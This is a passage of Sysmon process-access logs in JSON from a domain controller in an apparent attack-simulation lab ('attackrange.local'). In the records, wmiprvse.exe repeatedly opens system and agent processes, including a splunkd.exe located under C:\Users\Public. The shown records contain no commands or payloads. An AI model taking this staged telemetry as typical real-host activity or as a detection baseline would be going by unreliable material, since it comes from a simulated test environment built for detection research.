.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5887,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010B7860200}\r\nTargetProcessId: 2956\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010B7860200}","TargetProcessId":"2956","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5888,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010BB890200}\r\nTargetProcessId: 3004\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010BB890200}","TargetProcessId":"3004","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5889,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5890,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5891,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-00106CBC0200}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-00106CBC0200}","TargetProcessId":"2744","TargetImage":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5892,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001087BC0200}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5893,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-00108BBC0200}\r\nTargetProcessId: 2884\r\nTargetImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-00108BBC0200}","TargetProcessId":"2884","TargetImage":"C:\\Program Files 